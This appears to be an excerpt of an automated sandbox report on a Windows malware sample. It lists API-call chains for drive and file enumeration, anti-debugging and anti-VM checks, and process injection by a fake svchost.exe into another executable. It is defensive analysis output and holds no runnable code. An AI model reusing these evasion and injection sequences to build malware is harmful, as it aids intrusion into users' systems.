Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013A7CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_013A7CE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013ABE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,6_2_013ABE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013866D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_013866D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0322D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,10_2_0322D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0323BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,10_2_0323BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032166D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,10_2_032166D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03237CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,10_2_03237CE0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB
Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 30000
Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688548835.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632465085.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522994867.000000000088E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW<
Source: WlCVLbzNph.exe, 00000000.00000002.1442316835.000000000055E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ~,windows\system\vmhgfs.DLL
Source: svchost.exe, 00000002.00000003.1590750488.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085108104.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744102773.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644497267.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2686660345.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867489246.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916019687.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.2682996200.0000000000826000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW(
Source: nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013AB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWSz
Source: svchost.exe, 00000002.00000003.1499108924.000000000088C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW$
Source: C:\Windows\apppatch\svchost.exe; Process information queried: ProcessInformation
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_00401A30 rdtsc
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 5_2_014264A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA
Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary
Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_029A1360 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_029A1360 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_029A1000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 5_2_01201360 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 5_2_01201360 mov edx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 5_2_01201000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 6_2_01321360 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 6_2_01321360 mov edx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 6_2_01321000 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 10_2_03071360 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 10_2_03071360 mov edx, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 10_2_03071000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_004010A0 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,ReadFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\WlCVLbzNph.exe; Code function: 0_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Windows\apppatch\svchost.exe; Code function: 2_2_02C93240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 5_2_01433240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 6_2_013A3240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe; Code function: 10_2_03233240 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtUnmapViewOfSection: Direct from: 0x77462D3C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtSetInformationThread: Direct from: 0x774563F9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtSetTimerEx: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtEnumerateKey: Direct from: 0x77462DBC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtOpenKeyEx: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtSetInformationFile: Direct from: 0x77462D0C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtCreateKey: Direct from: 0x77462C6C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQueryAttributesFile: Direct from: 0x77462E6C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtOpenSection: Direct from: 0x77462E0C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtCreateFile: Direct from: 0x77462FEC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtOpenFile: Direct from: 0x77462DCC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtEnumerateValueKey: Direct from: 0x77462BAC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtSetInformationThread: Direct from: 0x77462ECC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQueryInformationToken: Direct from: 0x77462CAC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtTerminateThread: Direct from: 0x77462FCC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe NtAllocateVirtualMemory: Direct from: 0x77462B9C
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2C52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2AF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 2B42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 6E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: 732000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe base: F10000Jump to behavior
